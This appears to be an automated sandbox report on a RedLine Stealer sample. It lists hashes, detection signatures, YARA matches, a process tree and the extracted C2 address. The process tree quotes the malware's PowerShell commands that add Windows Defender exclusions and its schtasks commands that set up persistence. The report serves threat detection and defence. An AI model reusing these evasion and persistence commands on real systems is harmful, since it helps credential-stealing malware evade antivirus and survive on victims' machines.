Edit tour

Windows Analysis Report
owKQ0b029a.exe

Overview

General Information

Sample name:	owKQ0b029a.exe renamed because original name is a hash value
Original sample name:	5404B47556A2E1E9EB2F5DA481002616.exe
Analysis ID:	1474391
MD5:	5404b47556a2e1e9eb2f5da481002616
SHA1:	e3a45833fecb92ff8998fc6d4a13c9b80afe87db
SHA256:	9c6f132ef4142409bd7a1448d3dc52f774e9e33919031dac82f2afb27083945f
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

owKQ0b029a.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\owKQ0b029a.exe" MD5: 5404B47556A2E1E9EB2F5DA481002616)

PO.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)

powershell.exe (PID: 7636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8072 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7736 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO.exe (PID: 7904 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)

PO.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

QntRsaVyLKlY.exe (PID: 8024 cmdline: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)

schtasks.exe (PID: 2408 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

QntRsaVyLKlY.exe (PID: 6976 cmdline: "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe" MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)

conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.57.67:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x142fa:$a4: get_ScannedWallets 0x2c11a:$a4: get_ScannedWallets 0x43d3a:$a4: get_ScannedWallets 0x13158:$a5: get_ScanTelegram 0x2af78:$a5: get_ScanTelegram 0x42b98:$a5: get_ScanTelegram 0x13f7e:$a6: get_ScanGeckoBrowsersPaths 0x2bd9e:$a6: get_ScanGeckoBrowsersPaths 0x439be:$a6: get_ScanGeckoBrowsersPaths 0x11d9a:$a7: <Processes>k__BackingField 0x29bba:$a7: <Processes>k__BackingField 0x417da:$a7: <Processes>k__BackingField 0xfcac:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x27acc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3f6ec:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x116ce:$a9: <ScanFTP>k__BackingField 0x294ee:$a9: <ScanFTP>k__BackingField 0x4110e:$a9: <ScanFTP>k__BackingField
0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x13652:$a4: get_ScannedWallets 0x2b472:$a4: get_ScannedWallets 0x43092:$a4: get_ScannedWallets 0x124b0:$a5: get_ScanTelegram 0x2a2d0:$a5: get_ScanTelegram 0x41ef0:$a5: get_ScanTelegram 0x132d6:$a6: get_ScanGeckoBrowsersPaths 0x2b0f6:$a6: get_ScanGeckoBrowsersPaths 0x42d16:$a6: get_ScanGeckoBrowsersPaths 0x110f2:$a7: <Processes>k__BackingField 0x28f12:$a7: <Processes>k__BackingField 0x40b32:$a7: <Processes>k__BackingField 0xf004:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26e24:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3ea44:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10a26:$a9: <ScanFTP>k__BackingField 0x28846:$a9: <ScanFTP>k__BackingField 0x40466:$a9: <ScanFTP>k__BackingField
Process Memory Space: PO.exe PID: 7400	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO.exe PID: 7400	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO.exe PID: 7400	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: PO.exe PID: 7400	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x85fdd:$a4: get_ScannedWallets 0x84e84:$a5: get_ScanTelegram 0x85c66:$a6: get_ScanGeckoBrowsersPaths 0x83b17:$a7: <Processes>k__BackingField 0x8104a:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x8344b:$a9: <ScanFTP>k__BackingField
Process Memory Space: PO.exe PID: 7912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO.exe PID: 7912	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: PO.exe PID: 7912	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1feade:$a4: get_ScannedWallets 0x1fd985:$a5: get_ScanTelegram 0x1fe767:$a6: get_ScanGeckoBrowsersPaths 0x1fc618:$a7: <Processes>k__BackingField 0x1f9b4b:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1fbf4c:$a9: <ScanFTP>k__BackingField
Process Memory Space: QntRsaVyLKlY.exe PID: 8024	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QntRsaVyLKlY.exe PID: 8024	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: QntRsaVyLKlY.exe PID: 8024	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: QntRsaVyLKlY.exe PID: 8024	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1df8a:$a4: get_ScannedWallets 0x1ce31:$a5: get_ScanTelegram 0x1dc13:$a6: get_ScanGeckoBrowsersPaths 0x1bac4:$a7: <Processes>k__BackingField 0x18ff7:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1b3f8:$a9: <ScanFTP>k__BackingField
Process Memory Space: QntRsaVyLKlY.exe PID: 6976	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QntRsaVyLKlY.exe PID: 6976	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
15.2.PO.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.PO.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.2.PO.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
15.2.PO.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
7.2.PO.exe.4116088.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.4116088.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.4116088.3.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.4116088.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
7.2.PO.exe.412dea8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.412dea8.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.412dea8.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.412dea8.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
7.2.PO.exe.412dea8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.412dea8.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.412dea8.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.412dea8.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.4116088.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x4300a:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x41e68:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x42c8e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0x40aaa:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3e9bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField 0x403de:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.4116088.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x3feca:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x43581:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x38b70:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x42ab9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
7.2.PO.exe.4116088.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x4300a:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x41e68:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x42c8e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0x40aaa:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3e9bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField 0x403de:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.4116088.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x3feca:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x43581:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x38b70:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x42ab9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
Click to see the 31 entries

